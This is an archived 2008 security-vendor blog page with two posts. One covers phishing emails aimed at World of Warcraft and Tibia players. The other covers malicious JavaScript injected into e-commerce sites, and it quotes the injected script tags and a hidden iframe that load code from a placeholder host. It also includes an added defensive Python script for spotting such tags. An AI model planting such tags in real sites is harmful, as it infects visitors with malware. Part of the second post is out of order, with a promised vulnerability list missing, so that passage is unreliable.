Archive for January 14th, 2008

Phishing in the World of Warcraft and Tibia

January 14th, 2008 by Bernadette Irinco (Technical Communications)

Phishers tread the lands of the MMORPGs World of Warcraft and Tibia, reports the TrendLabs Content Security team. A sample of the phishing email that arrives in inboxes is shown below:

Phishing Email

It asks users to click a link that redirects them to a page asking for their account name and password. The phishers made no attempt to hide the actual phishing URL hxxp://jungkyukimphoto.com/bgm/…/, which is even displayed in the address bar. Trend Micro has already blocked access to the site.

The trend that drove the proliferation of Trojan spyware attempting to steal online game accounts and passwords is catching on in the phishing arena. The real profits generated by these virtual worlds are simply too powerful a lure.

E-commerce Sites Invaded

January 14th, 2008 by Carolyn Guevarra (Technical Communications)

TrendLabs received reports of a massive attack against legitimate e-commerce Web sites, particularly in the U.K., with one or two references to Dubai, UAE. These Web sites are injected with the following malicious JavaScript code, which takes advantage of several vulnerabilities to infiltrate an unsuspecting user’s system:

<script language='JavaScript' type='text/javascript' src='{random name}.js'></script>

The random file name of the JavaScript makes it difficult to search for more compromised pages. On top of that, the JavaScript is hosted on the compromised domain itself.

This routine is unlike other compromises, where Web sites are usually injected with a malicious iFrame link or found to reference a JavaScript hosted in _other_ domains, usually created and registered solely to host the malicious code or payload for these types of threats. For example:

<script language='JavaScript' type='text/javascript' src='http://otherdomain/maliciousscript.js'></script>

or

<iframe src=http://otherdomain/maliciouspage.html width=0 height=0></iframe>
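Because the injected file name is random, a site owner cannot search for it by name, but can compare every script a page references against the scripts that were actually deployed. The Python below is an added example, not code from TrendLabs; the deployed-script set, host names and file names are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class TagCollector(HTMLParser):
    """Records the attributes of every <script> and <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.tags.append((tag, dict(attrs)))

def audit_page(html, page_url, deployed_scripts):
    """Return sorted (finding, absolute_url) pairs for one page.
    deployed_scripts (assumed input): absolute script URLs the owner published.
    """
    collector = TagCollector()
    collector.feed(html)
    site = urlparse(page_url).netloc
    findings = set()
    for tag, attrs in collector.tags:
        if not attrs.get("src"):
            continue  # inline script or empty frame: nothing to resolve
        url = urljoin(page_url, attrs["src"])
        local = urlparse(url).netloc == site
        if tag == "script" and url not in deployed_scripts:
            # A local hit is the case in this post: a file on the site's own
            # domain that nobody deployed, whatever its random name is.
            kind = "unlisted-local-script" if local else "unlisted-external-script"
            findings.add((kind, url))
        elif tag == "iframe" and not local and "0" in (
                attrs.get("width"), attrs.get("height")):
            findings.add(("hidden-external-iframe", url))
    return sorted(findings)

# Constructed sample page; host names and file names are made up.
SAMPLE_URL = "http://shop.example/catalog/index.html"
SAMPLE_HTML = """<html><head>
<script type='text/javascript' src='/js/cart.js'></script>
<script language='JavaScript' type='text/javascript' src='qzxkvbnt.js'></script>
<script src='http://otherdomain.example/maliciousscript.js'></script>
</head><body>
<iframe src=http://otherdomain.example/maliciouspage.html width=0 height=0></iframe>
</body></html>"""
DEPLOYED = {"http://shop.example/js/cart.js"}

if __name__ == "__main__":
    for finding in audit_page(SAMPLE_HTML, SAMPLE_URL, DEPLOYED):
        print(finding)
```

Relative src values are resolved against the page URL first, so a script dropped next to the page is reported with its full path on the site's own domain.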

The following are some of the known vulnerabilities that this JavaScript exploits:

However, this is not the case here. Security researchers are still baffled by this event.

Users infected with this malicious JavaScript ultimately download a malicious .MOV file and Trojan programs onto their computers. Trend Micro detects the malicious JavaScript as JS_IESLICE.AQ and the malicious .MOV file as a variant of XML_HACK. The downloaded Trojan programs are detected as TROJ_DROPPER.NH and TROJ_AGENT.HJS.

As we know, cyberattacks nowadays are always driven by money. This is just the first in a long series of e-commerce-related invasions that will occur in 2008 if companies and users don’t take extra measures to secure their online businesses. Keep your software updated and be extra vigilant when doing business online… It’s still not too late to add another resolution for ’08.

Trend Micro Research Project Manager Ivan Macalintal says that this compromise is still under investigation. He adds: “Updates will be posted as soon as new information arrives so you better stay tuned!”

Many thanks to Mary Landesman of ScanSafe for providing the initial report on the topic.

